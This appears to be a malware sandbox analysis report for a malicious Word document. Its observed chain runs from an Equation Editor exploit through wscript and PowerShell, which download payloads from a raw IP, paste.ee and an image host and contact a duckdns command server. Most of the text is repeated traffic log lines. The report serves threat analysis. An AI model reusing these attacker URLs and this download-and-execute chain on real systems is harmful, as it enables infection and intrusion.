Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 23.95.60.75:80 -> 192.168.2.22:49165
Source: Traffic	Snort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 23.95.60.75:80 -> 192.168.2.22:49165

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 104.21.84.67 443			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: paste.ee

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: sembe.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown

DNS query: name: sembe.duckdns.org

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0366047A LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0366047A

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 194.187.251.115:14645

Source: WQQ.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: WQQ.vbs.9.dr	Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4

Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /144/WQDF.txt HTTP/1.1Host: 23.95.60.75Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /d/UZOyJ HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/htm/IEnetworkings.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.60.75Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.60.75

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_0366047A LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_0366047A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6ABBD88-0240-4BF7-AF42-5B250ACE83CC}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /d/UZOyJ HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic	HTTP traffic detected: GET /xampp/htm/IEnetworkings.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.60.75Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /144/WQDF.txt HTTP/1.1Host: 23.95.60.75Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: wscript.exe, 00000005.00000002.358338572.0000000003B40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.388425734.0000000004E75000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000008.00000002.403568622.0000000008171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.60.75
Source: powershell.exe, 00000008.00000002.403568622.0000000008171000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.60.75/144/WQDF.txt
Source: EQNEDT32.EXE, 00000002.00000002.351462646.000000000030F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.60.75/xampp/htm/IEnetworkings.html
